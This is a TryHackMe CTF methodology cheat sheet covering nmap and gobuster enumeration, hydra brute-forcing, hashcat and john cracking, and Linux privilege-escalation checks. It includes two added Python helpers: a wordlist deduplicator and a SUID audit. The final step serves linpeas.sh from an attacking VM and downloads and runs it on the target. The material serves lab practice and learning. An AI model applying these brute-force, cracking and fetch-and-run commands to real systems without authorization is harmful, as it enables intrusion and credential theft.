TryHackMe | CTF resolution steps
This article comprises some steps that I take when trying to solve CTFs on THM.
Friendly reminder: the following steps are not absolute; most of the time there are better ways to achieve the same goal. This list comes from lots of trial and error, and from mistakes I managed to learn from.
As I am truly eager to keep learning about cyber security, and to get more creative while solving CTFs, I will keep improving this list as best I can. Nonetheless, feel free to send suggestions 🤓.
Enumeration
1. Use nmap to see which ports are open:
nmap -sCV $IP_ADDRESS
2. Try to log any request/response headers from the web server (if any) to find clues about the next steps;
3. If there is a web server exposed, you can run gobuster to brute-force URIs:
gobuster dir -u http://$IP_ADDRESS \
  -x html,txt,js,py,php \
  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
4. If, for some reason, you need to brute-force passwords, you can use hydra. Here's an example:
hydra -l username -P /usr/share/wordlists/rockyou.txt -vV $IP_ADDRESS service
Just a quick note: if you are using a different password input file, bear in mind that it may have duplicate entries.
sort $filename | uniq > filename_with_no_duplicates.txt
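The `sort | uniq` pipeline above removes the duplicates, but it also reorders the list, and lists such as rockyou.txt are ordered by frequency, so the most likely candidates stop coming first. The following Python function, an added example that is not part of the original article, removes duplicates while keeping the first occurrence in its original position. It works on bytes because rockyou.txt contains lines that are not valid UTF-8 and would fail a text-mode read; the sample input is constructed for the demo.

```python
def dedupe_wordlist(data: bytes) -> bytes:
    """Remove duplicate lines from a wordlist, keeping the first occurrence and
    the original order (frequency-sorted lists stay frequency-sorted, unlike
    with `sort | uniq`). Operates on bytes so that non-UTF-8 entries, which
    rockyou.txt does contain, do not raise UnicodeDecodeError."""
    seen = set()
    kept = []
    for line in data.splitlines():  # bytes.splitlines handles \n, \r and \r\n
        if not line or line in seen:
            continue                # blank lines and repeats are dropped
        seen.add(line)
        kept.append(line)
    return b"\n".join(kept) + (b"\n" if kept else b"")


def dedupe_file(src: str, dst: str):
    """Read src in binary mode, write the de-duplicated list to dst and return
    (lines_read, lines_written) so the caller can see how much was removed."""
    with open(src, "rb") as fh:
        data = fh.read()
    result = dedupe_wordlist(data)
    with open(dst, "wb") as fh:
        fh.write(result)
    return len(data.splitlines()), len(result.splitlines())


if __name__ == "__main__":
    # Constructed sample standing in for a real wordlist: CRLF line endings,
    # duplicates, and one entry that is not valid UTF-8.
    sample = b"password\r\n123456\npassword\n\xff\xfe\n123456\n"
    print(dedupe_wordlist(sample))  # b'password\n123456\n\xff\xfe\n'
```

Call `dedupe_file("/path/to/wordlist.txt", "wordlist_no_duplicates.txt")` to process a real file; the returned pair tells you how many lines were dropped.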
5. To crack hashes, you can use hashcat or john.
# using hashcat
# identify the hash type and pick the matching -m mode number from https://hashcat.net/wiki/doku.php?id=example_hashes
echo "hash-example" > hash
# -a 0 is the straight (wordlist) attack mode; -a requires a mode number
hashcat -a 0 -m $HASH_CAT_MODE hash /usr/share/wordlists/rockyou.txt
# using john
echo "hash-example" > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Privilege escalation
1. If you have access to a particular server, try to list all the commands you are allowed to execute as a user:
sudo -l
2. Based on the commands you can run, search GTFOBins for ways to bypass security restrictions;
3. Check the cron jobs in /etc/crontab. Sometimes it contains custom scripts that run as root, or that can access other users on the server;
4. Search for SUID executable files:
find / -type f -perm -u=s 2>/dev/null
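The find command above lists every setuid file; what matters next is which of those are not supposed to be there. The following Python script, an added example that is not part of the original article, does the same walk with `os.lstat` (skipping unreadable entries and never following symlinks, like `2>/dev/null` and `-type f`) and then compares the hits against a baseline of expected setuid programs, flagging anything outside the baseline or world-writable. The baseline set and the `backup_tool` sample file are constructed assumptions for the demo; a real baseline comes from a known-good image of the same distribution.

```python
import os
import stat
import tempfile

# Constructed baseline of setuid/setgid programs expected on the host. This is an
# assumption for the example; take a real baseline from a known-good image.
EXPECTED_SETUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def find_setuid(root="/"):
    """Walk `root` and return (path, st_mode) for every regular file that has the
    setuid or setgid bit set. Unreadable entries are skipped, which is what the
    `2>/dev/null` on the find command does."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, st.st_mode))
    return found


def classify(entries, baseline=EXPECTED_SETUID):
    """Split (path, st_mode) pairs into 'expected' and 'unexpected'. A file is
    expected only if it is in the baseline AND is not world-writable; anything
    else is reported together with the bits that made it suspicious."""
    report = {"expected": [], "unexpected": []}
    for path, mode in entries:
        bits = []
        if mode & stat.S_ISUID:
            bits.append("setuid")
        if mode & stat.S_ISGID:
            bits.append("setgid")
        if mode & stat.S_IWOTH:
            bits.append("world-writable")
        entry = (path, "+".join(bits))
        if path in baseline and not mode & stat.S_IWOTH:
            report["expected"].append(entry)
        else:
            report["unexpected"].append(entry)
    return report


def demo():
    """Build a throwaway directory with one constructed setuid file and one plain
    file, then return the names the audit flags. A temp dir is used instead of
    `/` so the example runs quickly and without privileges."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_path = os.path.join(tmp, "backup_tool")  # constructed sample
        plain_path = os.path.join(tmp, "notes.txt")
        for p in (suid_path, plain_path):
            with open(p, "w") as fh:
                fh.write("sample\n")
        os.chmod(suid_path, 0o4755)  # the owner may set setuid on their own file
        flagged = classify(find_setuid(tmp))
        return [os.path.basename(p) for p, _ in flagged["unexpected"]]


if __name__ == "__main__":
    print(demo())  # ['backup_tool']
    for path, why in classify(find_setuid("/"))["unexpected"]:
        print(f"review: {path} ({why})")
```

Running the script as is audits the whole filesystem; the `unexpected` list is what you review, and a world-writable setuid file is reported even when its path is in the baseline, since the bit is only as trustworthy as the file it sits on.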
5. Use linPEAS to enumerate potential ways to escalate privileges;
# From the attacking VM
cd $LINPEAS_EXECUTABLE_PATH
python3 -m http.server 9000
# From the CTF machine
wget $ATTACKING_VM_IP:9000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Save the result and show it with colors
./linpeas.sh > result_linpeas.txt
less -R result_linpeas.txt